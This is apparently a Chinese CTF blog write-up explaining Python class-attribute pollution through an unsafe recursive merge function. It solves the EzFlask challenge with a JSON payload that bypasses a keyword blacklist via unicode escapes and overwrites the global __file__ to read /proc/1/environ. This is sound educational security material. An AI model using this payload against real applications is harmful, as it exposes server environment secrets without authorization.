【CTF】Python原型链污染

已于 2023-08-05 13:15:53 修改
阅读量784 收藏 5
点赞数 1
文章标签: python 开发语言 linux
于 2023-08-05 13:14:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Luminous_song/article/details/132118473
版权

Python原型链污染

原型链

在Python中每个对象都有一个原型,原型上定义了对象可以访问的属性和方法。当对象访问属性或方法时,会先在自身查找,如果找不到就会去原型链上的上级对象中查找,原型链污染攻击的思路是通过修改对象原型链中的属性,使得程序在访问属性或方法时得到不符合预期的结果。

原型链污染

和JavaScript的原型链污染差不多,都是需要merge函数来修改父类的属性

class father:
    secret = "hello"
class son_a(father):
    pass
class son_b(father):
    pass
def merge(src, dst):
    for k, v in src.items():
        print(f"k:{k}\t v:{v}")
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
instance = son_b()
print(instance)
payload = {
    "__class__" : { 
        "__base__" : { # 有继承关系,使用__base__找父类
            "secret" : "world"
        }
    }
}
print(son_a.secret)
#hello
print(instance.secret)
#hello
merge(payload, instance)
# k:__class__      v:{'__base__': {'secret': 'world'}}
# getattr(dst,k):  <class '__main__.son_b'>
# k:__base__       v:{'secret': 'world'}
# getattr(dst,k):  <class '__main__.father'>
# k:secret         v:world
print(son_a.secret)
#world
print(instance.secret)
#world

在这个例子中:

  1. 首先在payload中读入__class__,都是查看对象所在的类,在instance中是有__class__这个属性,因此进入elif hasattr(dst, k) and type(v) == dict:这个语句中,继续执行merge
  2. merge其中输入的dst从原本的instance变为son_b这个类,而后使用__base__查看son_b中是否有父类,并寻找这个父类,根据语句elif hasattr(dst, k) and type(v) == dict继续执行merge
  3. merge其中dst变为father这个类,type(v)是字符串,则执行setattr(dst, k, v),father中的secret属性设置为world
  4. 因为父类的secret值改变,son_a的secret属性也寻找到father这个父类中,值也变为world

在这个例子中创建的对象instance对应的son_b类是存在父类的,但很多时候是没有父类的,此时就可以利用python的一些属性来寻找对应变量

全局变量获取

在Python中,函数或类方法均具有一个__globals__属性,该属性将函数或类方法所申明的变量空间中的全局变量以字典的形式返回,这样就可以用__globals__来修改想要修改的全局变量值

DSACTF2023七月暑期赛–EzFlask

进入靶机看到给出了源码

import uuid 
from flask import Flask, request, session 
import json

black_list = ["__init__".encode(),"__globals__".encode()]

app = Flask(__name__) 
app.secret_key = str(uuid.uuid4()) 
def check(data): 
    for i in black_list:
        print(i)
        if i in data: 
            print(i)
            return False 
    return True 
        
def merge(src, dst): 
    for k, v in src.items(): 
        if hasattr(dst, '__getitem__'): 
            if dst.get(k) and type(v) == dict: 
                merge(v, dst.get(k)) 
            else: dst[k] = v 
        elif hasattr(dst, k) and type(v) == dict: 
            merge(v, getattr(dst, k)) 
        else: setattr(dst, k, v) 
        
class user(): 
    def __init__(self): 
        self.username = "" 
        self.password = "" 
        pass 
    
    def check(self, data): 
        if self.username == data['username'] and self.password == data['password']: 
            return True 
        return False 

Users = [] 
@app.route('/register',methods=['POST']) 
def register(): 
    if request.data: 
        try: 
            print(request.data)
            print(json.loads(request.data))
            if not check(request.data):
                print("No check")
                return "Register Failed" 
            data = json.loads(request.data)
            print(data)
            if "username" not in data or "password" not in data: 
                print("no username or passwd")
                return "Register Failed" 
            User = user() 
            merge(data, User) 
            Users.append(User) 
        except Exception as e: 
            print("Exception: ",e)
            return "Register Failed"
        
        return "Register Success" 
    else: 
        print("no data")
        return "Register Failed" 

@app.route('/login',methods=['POST']) 
def login(): 
    if request.data: 
        try: 
            print(request.data)
            print(json.loads(request.data))
            data = json.loads(request.data).encode()
            if "username" not in data or "password" not in data: 
                return "Login Failed" 
            for user in Users: 
                if user.check(data): 
                    session["username"] = data["username"] 
                    return "Login Success" 
        except Exception: 
            return "Login Failed" 
        return "Login Failed" 
        
@app.route('/',methods=['GET']) 
def index(): 
    return open(__file__, "r").read() 
    
if __name__ == "__main__": 
    app.run(host="0.0.0.0", port=5010)

看到merge函数首先想到原型链污染,在index函数中是可以直接读取__file__对应的文件,因此想到利用merge函数去修改这个变量,将其变为我想看到的文件,可以看到register是创建了User对象,将data中的数值merge,那么就要在data中写上payload,在User类中重写了__init__类,同时__file__变量是一个全局值,就可以用上面写到的__globals__函数来获取全局变量并进行修改,最后再重新进入index中读取文件内容,因此最终payload为

data = {
	"username" : "admin", 
	"password" : "123456", # 在data中定义username和password保证data可以进入merge函数中
	"\u005F\u005F\u0069\u006E\u0069\u0074\u005F\u005F": { # 在check中可以看到有black_list,__init__被过滤了,使用unioncode进行绕过
		"__globals__" : {
			"__file__": "../../../proc/1/environ" # 大部分的flag都隐藏在环境变量中
		}
	}
}

参考资料

  1. Python原型链污染变体(prototype-pollution-in-python)
  2. 深入理解 JavaScript Prototype 污染攻击
  3. Python原型链污染
Luminous_song
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-python像素画图工具
10-06
CTF中经常会遇到很多图片的隐写题目需要使用脚本来解题,最常用到的就是使用python中的PIL库,所以如果要更好的解出图片隐写相关处理的题目,掌握好这个库的使用是必要的。
CTF 离线C PHP python 汇编函数查询 chm电子书合集
10-06
CTF 离线C PHP python 汇编函数查询 chm电子书合集 离线比赛时使用 学习
redpwnctf-web-blueprint-javascript 原型链污染学习总结
weixin_30376453的博客
08-19 239
前几天看了redpwn的一道web题,node.js的web,涉及知识点是javascript 原型链污染,以前没咋接触过js,并且这个洞貌似也比较新,因此记录一下学习过程 1.本机node.js环境安装 题目都给了源码,所以本地就可以直接安装package.json依赖并本地模拟调试 首先subline安装node环境: http://nodejs.org/ http...
原型链污染 --- 2022.04ctf
m0_63069714的博客
03-15 609
所以我们需要去修改devSettings.root的属性,网上追溯,如果要走到这个流程,必须改使得checkHost( )的值为ture,才能够进入merge方法中,对devSettings对象的值进行修改。JavaScript中,数组的下标可以用字符或是字符串数字来取值,所以在原型链中,我们可以给[ ]对象添加一个名称为1的属性,这样temp再通过下标1取值的时候,实际上取到的是数组中属性为1的值。接下来要做的,就是继续去替换devSettings.root的值了,替换body中的即可。
原型链污染
m0_62422842的博客
06-06 2244
原型链污染是一个关于前端js的相关漏洞,原型链污染可拆分为两部分,什么是原型链,又如何进行污染
CATCTF wife原型链污染
qq_51796436的博客
02-21 975
原型链污染原理:https://drun1baby.github.io/2022/12/29/JavaScript-%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/如下代码,prototype是newClass类的一个属性。newClass实例化的对象newObj的.__proto__指向newClass类的JSON 解析的情况下,__proto__会被认为是一个真正的“键名”,而不代表“原型”。如果是则__proto__会被认为是o2的原型。
NodeJS原型链污染
Aiwin的博客
05-11 1043
NodeJS原型链污染
CTF密码学-Python古典密码加密解密脚本
04-30
该压缩包包含了Python脚本编写的摩斯密码加密解密、培根密码加密解密、ASCII编码解码、凯撒密码加密解密,可用于教学和实操
基于python的网络攻防平台(CTF)设计与实现
07-30
网络攻防演练系统是基于python中flask框架下平台,该平台借助于网上各种CTF靶场设计框架进行构想,搭建一个CTF解题模式为主的网络攻防平台。系统主要完成以下几个模块:用户登录与注册系统模块、用户个人解答详情...
CTF赛题:将txt文件提取转换为图片(二维码)
10-20
提取txt文档中的大量0和1,生成二维码
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
JavaScript Prototype污染攻击(CTF 例题分析)
a3320315的博客
11-03 1944
0x01 先谈谈自己的理解 function a(){} var b=new a() var c = {} a.__proto__.__proto__ == b.__proto__.__proto__ == c.__proto__ a.__proto__ != b.__proto__ != c 这个时候 b的__proto__ 指向的就是a.prototype a.prototype的_...
[GYCTF2020]Ez_Express-原型链污染学习
cjdgg的博客
08-18 1952
[GYCTF2020]Ez_Express-原型链污染学习 最近学习下nodejs相关的题目,所以做了这道题 进入题目界面长这样 简单的试了下功能,也就是一个登录注册按钮,登陆后如下所示 要求需要ADMIN登录,这是一个不能注册的账户,而且我们又不知道密码 没法进行下去的时候试一试扫描目录,结果还真扫出了源代码 通过审代码我们发现,注册的时候调用了safeKeyword函数,这个函数使我们注册时不能用admin,但是又需要题目要求用ADMIN登录才行 这里我是正好看了做上一道js题目时收藏的tric
HZNUCTF-ezflask
qq_44640313的博客
03-27 552
jinja2的注入
DASCTF 2023 & 0X401七月暑期挑战赛 web题 EzFlask
最新发布
m0_63138919的博客
08-30 233
1
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
Jay17的博客
08-05 1327
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细题解wp
SSTI Flask做题记录1
Firebasky的博客
10-12 992
这个知识点是前几天从接触的,是因为创建HDCTF的比赛遇到的于是自己就来记录一下和学习一下 1. ezflask hdctfezflask地址 这个题比较简单,直接一层一层的去找一找利用的类和函数就可以啦 记录一下自己的步骤: 1.{{''.__class__}} # 获得单引号的类型 2.{{''.__class__.__base__}} #获得object 3.{{''.__class__.__base__.__subclasses__()}}#获得基类 4.{{''.__class__.__.
buuctf--easyflask
qq_46263951的博客
01-04 868
根据提示访问/file?file=index.js,可以看到提示源码在/app/source #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type
HZNUCTF2023 web
weixin_63231007的博客
05-07 1341
HZNUCTF校赛 赛后复现
python原型链污染
08-20
Python原型链污染(Prototype Pollution)是指通过修改对象原型链中的属性,对程序的行为产生意外影响或利用漏洞进行攻击的一种技术。在Python中,每个对象都有一个原型,原型上定义了对象可以访问的属性和方法。当对象访问属性或方法时,会先在自身查找,如果找不到就会去原型链上的上级对象中查找。原型链污染攻击的思路是通过修改对象原型链中的属性,使得程序在访问属性或方法时得到不符合预期的结果。一些常见的原型链污染攻击包括修改内置对象的原型和修改全局对象的原型等。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [Python原型链污染](https://blog.csdn.net/Elite__zhb/article/details/131877828)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [【CTFPython原型链污染](https://blog.csdn.net/Luminous_song/article/details/132118473)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值